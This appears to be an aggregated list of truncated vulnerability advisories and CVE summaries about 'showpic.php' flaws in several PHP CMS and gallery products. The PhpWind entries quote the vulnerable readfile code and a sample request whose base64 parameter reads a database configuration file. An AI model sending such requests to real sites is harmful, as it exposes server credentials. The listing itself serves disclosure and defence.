CVE-2018-6881

EmpireCMS 6.6 allows remote attackers to discover the full path via an array value for a parameter to admin/tool/ShowPic.php...

CVE-2018-6881

EmpireCMS 6.6 allows remote attackers to discover the full path via an array value for a parameter to admin/tool/ShowPic.php...

Albinator 2.0.8 showpic.php preloadSlideShow Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...

Typo3 3.5 b5 Showpic.PHP File Enumeration Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. Thi...

PhpWind anti-theft chain plug-in Showpic. php local file read vulnerability-vulnerability warning-the black bar safety net

Vulnerability file: showpic.php str=$SERVER'QUERYSTRING'; $img=base64decode$str; $codelen=strlen$safeguard;//get the additional code length $img=substr$img,$codelen; //remove the additional code readfile$img; Submitted parameters are base64 encoded directly using readfile to read the file,so you...

PhpWind 防盗链插件Showpic.php本地读文件漏洞

showpic.php str=$SERVER'QUERYSTRING'; $img=base64decode$str; $codelen=strlen$safeguard;//获取附加码长度 $img=substr$img,$codelen; //去掉附加码 readfile$img; 提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容 PhpWind http://www.PhpWind.net http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==...

CVE-2007-2098

Multiple cross-site scripting XSS vulnerabilities in showpic.php in Wabbit PHP Gallery 0.9 allow remote attackers to inject arbitrary web script or HTML via the 1 pic and 2 gal parameters...

Wabbit PHP Gallery v0.9 Cross Site Scripting

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Resear...

CVE-2006-2181

Multiple cross-site scripting XSS vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 cid parameter to dlisting.php or 2 preloadSlideShow parameter to showpic.php...

CVE-2006-2181

CVE-2006-2181: Multiple cross-site scripting (XSS) vulnerabilities affect Albinator 2.0.8 and earlier. The issues allow remote attackers to inject arbitrary web script or HTML via (1) the cid parameter in dlisting.php, and (2) the preloadSlideShow parameter in showpic.php. The description does no...

CVE-2006-2181

Multiple cross-site scripting XSS vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 cid parameter to dlisting.php or 2 preloadSlideShow parameter to showpic.php...

TYPO3 Security Bulletin

A Cross Site Scripting issue has been found in showpic.php. Component Type: Core Affected Components: showpic.php Versions: TYPO3 3.8.0 and earlier Vulnerability Type: Cross Site Scripting Severity: High Problem Description: A Cross Site Scripting issue has been found in showpic.php. Solution: Th...

Typo3 3.5 b5 - showpic.php File Enumeration

Typo3 3.5 b5 - showpic.php File Enumeration source: https://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php'...

Typo3 3.5 b5 - 'showpic.php' File Enumeration

source: https://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. This type of information may be usefu...